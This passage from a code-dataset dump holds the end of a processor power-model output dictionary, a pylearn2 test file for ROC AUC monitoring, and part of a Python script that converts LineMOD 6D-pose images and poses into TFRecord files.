'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.311228,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.501999,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.253392,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.06662,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.171456,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.2792,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.227348,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0130543,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.177895,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0965445,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.405243,
'Execution Unit/Register Files/Runtime Dynamic': 0.109599,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.430526,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.841634,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.80104,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000732837,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000732837,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000637026,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000245906,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00138687,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00348957,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0070719,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0928107,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.90356,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.229625,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.315227,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.40858,
'Instruction Fetch Unit/Runtime Dynamic': 0.648225,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0626646,
'L2/Runtime Dynamic': 0.00572501,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.84618,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.778221,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0520569,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0520569,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.092,
'Load Store Unit/Runtime Dynamic': 1.087,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.128363,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.256727,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0455566,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0464908,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.367061,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.037664,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.601429,
'Memory Management Unit/Runtime Dynamic': 0.0841549,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.0334,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.598048,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0213199,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.143953,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.763321,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.38947,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8894168404944898,
'Runtime Dynamic': 3.8894168404944898,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.342426,
'Runtime Dynamic': 0.166856,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 75.0789,
'Peak Power': 108.191,
'Runtime Dynamic': 15.5163,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 74.7365,
'Total Cores/Runtime Dynamic': 15.3495,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.342426,
'Total L3s/Runtime Dynamic': 0.166856,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.06674 | 124 | 0.682033 | 8,086 | 68,611 | 5.781227 | 0.067153 | 0.123559 | 0.112948 | 0.093439 | 0.940274 | 0.932359 | 0.91931 | 0.887993 | 0.862066 | 0.842279 | 0 | 0.13183 | 0.224323 | 68,611 | 914 | 125 | 75.06674 | 0.746543 | 0 | 0 | 0.642232 | 0 | 0 | 0.657392 | 0.048097 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eefb6d0c42fe153f8f2afeaa7b4965f932dc61cc | 5,778 | py | Python | pylearn2/train_extensions/tests/test_roc_auc.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | 3 | 2016-01-23T10:18:39.000Z | 2019-02-28T06:22:45.000Z | pylearn2/train_extensions/tests/test_roc_auc.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | pylearn2/train_extensions/tests/test_roc_auc.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | 1 | 2015-03-30T00:40:28.000Z | 2015-03-30T00:40:28.000Z | """
Tests for ROC AUC.
"""
from pylearn2.config import yaml_parse
from pylearn2.testing.skip import skip_if_no_sklearn
def test_roc_auc():
"""Test RocAucChannel."""
skip_if_no_sklearn()
trainer = yaml_parse.load(test_yaml)
trainer.main_loop()
def test_roc_auc_one_vs_rest():
"""Test one vs. rest RocAucChannel."""
skip_if_no_sklearn()
trainer = yaml_parse.load(test_yaml_ovr)
trainer.main_loop()
def test_roc_auc_one_vs_one():
"""Test one vs. rest RocAucChannel."""
skip_if_no_sklearn()
trainer = yaml_parse.load(test_yaml_ovo)
trainer.main_loop()
test_yaml = """
!obj:pylearn2.train.Train {
dataset:
&train !obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 10,
num_classes: 2,
},
model: !obj:pylearn2.models.mlp.MLP {
nvis: 10,
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: 0.05,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 2,
irange: 0.,
}
],
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
monitoring_dataset: {
'train': *train,
},
batches_per_iter: 1,
monitoring_batches: 1,
termination_criterion: !obj:pylearn2.termination_criteria.And {
criteria: [
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
!obj:pylearn2.termination_criteria.MonitorBased {
channel_name: train_y_roc_auc,
prop_decrease: 0.,
N: 1,
},
],
},
},
extensions: [
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {},
],
}
"""
test_yaml_ovr = """
!obj:pylearn2.train.Train {
dataset:
&train !obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 10,
num_classes: 3,
},
model: !obj:pylearn2.models.mlp.MLP {
nvis: 10,
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: 0.05,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.,
}
],
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
monitoring_dataset: {
'train': *train,
},
batches_per_iter: 1,
monitoring_batches: 1,
termination_criterion: !obj:pylearn2.termination_criteria.And {
criteria: [
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
!obj:pylearn2.termination_criteria.MonitorBased {
channel_name: train_y_roc_auc,
prop_decrease: 0.,
N: 1,
},
],
},
},
extensions: [
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-0vX,
positive_class_index: 0,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-1vX,
positive_class_index: 1,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-2vX,
positive_class_index: 2,
},
],
}
"""
test_yaml_ovo = """
!obj:pylearn2.train.Train {
dataset:
&train !obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 10,
num_classes: 3,
},
model: !obj:pylearn2.models.mlp.MLP {
nvis: 10,
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: 0.05,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.,
}
],
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
monitoring_dataset: {
'train': *train,
},
batches_per_iter: 1,
monitoring_batches: 1,
termination_criterion: !obj:pylearn2.termination_criteria.And {
criteria: [
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
!obj:pylearn2.termination_criteria.MonitorBased {
channel_name: train_y_roc_auc,
prop_decrease: 0.,
N: 1,
},
],
},
},
extensions: [
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-0v1,
positive_class_index: 0,
negative_class_index: 1,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-0v2,
positive_class_index: 0,
negative_class_index: 2,
},
!obj:pylearn2.train_extensions.roc_auc.RocAucChannel {
channel_name_suffix: roc_auc-1v2,
positive_class_index: 1,
negative_class_index: 2,
},
],
}
"""
| 28.60396 | 78 | 0.526134 | 570 | 5,778 | 5.042105 | 0.164912 | 0.130132 | 0.055672 | 0.06263 | 0.905706 | 0.905706 | 0.905706 | 0.883438 | 0.883438 | 0.860473 | 0 | 0.032231 | 0.371755 | 5,778 | 201 | 79 | 28.746269 | 0.759504 | 0.017999 | 0 | 0.672043 | 0 | 0 | 0.903911 | 0.313396 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016129 | false | 0 | 0.010753 | 0 | 0.026882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
013b6c8419f5e40c714188de5273d3a785e0fb5f | 11,822 | py | Python | src/preprocessing_scripts/generate_test_data.py | stevsics/attention_6d_pose | 5b1da42ddb54efb63e76ed84c65b37b3471f42d6 | [
"MIT"
] | 3 | 2022-01-31T17:03:08.000Z | 2022-02-23T00:08:32.000Z | src/preprocessing_scripts/generate_test_data.py | stevsics/attention_6d_pose | 5b1da42ddb54efb63e76ed84c65b37b3471f42d6 | [
"MIT"
] | null | null | null | src/preprocessing_scripts/generate_test_data.py | stevsics/attention_6d_pose | 5b1da42ddb54efb63e76ed84c65b37b3471f42d6 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
import os
import cv2
from pyrr import Quaternion
import copy
object_names = ['ape','cam','cat','duck','glue','iron','phone',
'benchvise','can','driller','eggbox','holepuncher','lamp']
object_names_occlusion = ['ape','cat','duck','glue','can','driller','eggbox','holepuncher']
object_indeces = [it for it in range(len(object_names))]
camera_intrinsic_matrix_syn = np.array([[700., 0., 320.],
[0., 700., 240.],
[0., 0., 1.]])
camera_intrinsic_matrix_real = np.array([[572.41140, 0. , 325.26110],
[0. , 573.57043, 242.04899],
[0. , 0. , 1. ]])
R_init = np.array([
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0],
])
def save_tf_record_file(out_folder, it_tf_record, examples):
tf_num = "%06d" % it_tf_record
tfrecord_file_out = os.path.join(out_folder, tf_num + '.tfrecord')
with tf.python_io.TFRecordWriter(tfrecord_file_out) as writer:
for it_save in range(len(examples)):
it_example = examples[it_save]
writer.write(it_example.SerializeToString())
return None
def proccess_real_data_occlusion_linemod(in_folder_name, linemod_folder, init_pose_folder_name, out_folder_name, each_object_separate=False):
out_folder_name = os.path.join(out_folder_name, 'linemod_occlusion')
if not os.path.exists(out_folder_name):
os.mkdir(out_folder_name)
for it_obj in range(len(object_names)):
if not object_names[it_obj] in object_names_occlusion:
continue
print("Object name: " + object_names[it_obj] + ", object index num: " + str(it_obj))
folder_poses = os.path.join(in_folder_name, 'blender_poses', object_names[it_obj])
folder_images = os.path.join(in_folder_name, 'RGB-D', 'rgb_noseg')
out_folder_name_obj = os.path.join(out_folder_name, object_names[it_obj])
if not os.path.exists(out_folder_name_obj):
os.mkdir(out_folder_name_obj)
occlusion_test_file = os.path.join(linemod_folder, object_names[it_obj], 'test_occlusion.txt')
inds = np.loadtxt(occlusion_test_file, np.str)
inds = [int(os.path.basename(ind).replace('.jpg', '')) for ind in inds]
it_tf_record = 0
examples = []
for it_img, it_indx in enumerate(inds):
if each_object_separate:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
else:
if (it_img % 100) == 0:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
it_obj_name_pose = "pose" + str(it_indx) + ".npy"
it_obj_name_img = "color_" + "%05d" % it_indx + ".png"
poses_file = os.path.join(folder_poses, it_obj_name_pose)
image_file = os.path.join(folder_images, it_obj_name_img)
pos = np.zeros((1, 3))
quat = np.zeros((1, 4))
if os.path.exists(poses_file):
data = np.load(poses_file)
else:
data = np.array([[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0], ])
R_mat = data[:3, :3]
pos[0, :] = data[:3, 3]
quat[0, :] = Quaternion.from_matrix(R_mat)
cls_indexes = [object_indeces[it_obj]]
cls_indexes_num = [1]
# read image
img_name = os.path.join(folder_images, image_file)
out_img = cv2.imread(img_name)
encode_image = tf.compat.as_bytes(cv2.imencode(".png", out_img)[1].tostring())
# read init pose
it_obj_name_init = "%06d" % it_img + "_predict.npy"
init_pose_file = os.path.join(init_pose_folder_name, object_names[it_obj], it_obj_name_init)
predict_data = np.load(init_pose_file, allow_pickle='TRUE').item()
Rt_mat_init = predict_data["pose_pred"]
R_mat_init = np.matmul(Rt_mat_init[:3, :3], R_init)
quat_init = Quaternion.from_matrix(R_mat_init)
pos_init = Rt_mat_init[:, 3]
if np.isnan(pos_init[0]):
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
if np.linalg.norm(pos_init) > 10.0:
pos_init = np.array([0.0, 0.0, 10.0])
quat_init = np.array([0.0, 0.0, 0.0, 1.0])
num_of_objects = 13
K_init_all = np.zeros((num_of_objects, 3, 3))
for it_img_obj in range(num_of_objects):
K_init_all[it_img_obj, :, :] = copy.copy(camera_intrinsic_matrix_real)
feature = {
"init_pose": tf.train.Feature(float_list=tf.train.FloatList(value=pos_init)),
"init_quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat_init)),
"cls_indexes": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes)),
"obj_num": tf.train.Feature(int64_list=tf.train.Int64List(value=cls_indexes_num)),
"pos": tf.train.Feature(float_list=tf.train.FloatList(value=pos.reshape(-1))),
"quat": tf.train.Feature(float_list=tf.train.FloatList(value=quat.reshape(-1))),
"img": tf.train.Feature(bytes_list=tf.train.BytesList(value=[encode_image])),
"K_init_all": tf.train.Feature(float_list=tf.train.FloatList(value=K_init_all.reshape(-1))),
}
tf_record_example = tf.train.Example(features=tf.train.Features(feature=feature))
examples.append(tf_record_example)
if not (len(examples) == 0):
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
def proccess_real_data_linemod(linemod_folder, init_pose_folder_name, out_folder_name, each_object_separate=False):
out_folder_name = os.path.join(out_folder_name, 'linemod')
if not os.path.exists(out_folder_name):
os.mkdir(out_folder_name)
for it_obj in range(len(object_names)):
print("Object name: " + object_names[it_obj] + ", object index num: " + str(it_obj))
in_folder_name_obj = os.path.join(linemod_folder, object_names[it_obj])
folder_images = os.path.join(in_folder_name_obj, "JPEGImages")
in_folder_name_mask_obj = os.path.join(in_folder_name_obj, "mask")
folder_poses = os.path.join(in_folder_name_obj, "pose")
out_folder_name_obj = os.path.join(out_folder_name, object_names[it_obj])
if not os.path.exists(out_folder_name_obj):
os.mkdir(out_folder_name_obj)
occlusion_test_file = os.path.join(linemod_folder, object_names[it_obj], 'test.txt')
inds = np.loadtxt(occlusion_test_file, np.str)
inds = [int(os.path.basename(ind).replace('.jpg', '')) for ind in inds]
it_tf_record = 0
examples = []
for it_img, it_indx in enumerate(inds):
if each_object_separate:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
else:
if (it_img % 100) == 0:
if not (len(examples) == 0):
print(it_img)
save_tf_record_file(out_folder_name_obj, it_tf_record, examples)
it_tf_record += 1
examples = []
it_obj_name_pose = "pose" + str(it_indx) + ".npy"
it_obj_name_img = "%06d" % it_indx + ".jpg"
poses_file = os.path.join(folder_poses, it_obj_name_pose)
image_file = os.path.join(folder_images, it_obj_name_img)
pos = np.zeros((1, 3))
quat = np.zeros((1, 4))
if os.path.exists(poses_file):
data = np.load(poses_file)
else:
data = np.array([[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0], ])
R_mat = data[:3, :3]
pos[0, :] = data[:3, 3]
quat[0, :] = Quaternion.from_matrix(R_mat)
cls_indexes = [object_indeces[it_obj]]
cls_indexes_num = [1]
# read image
img_name = os.path.join(folder_images, image_file)
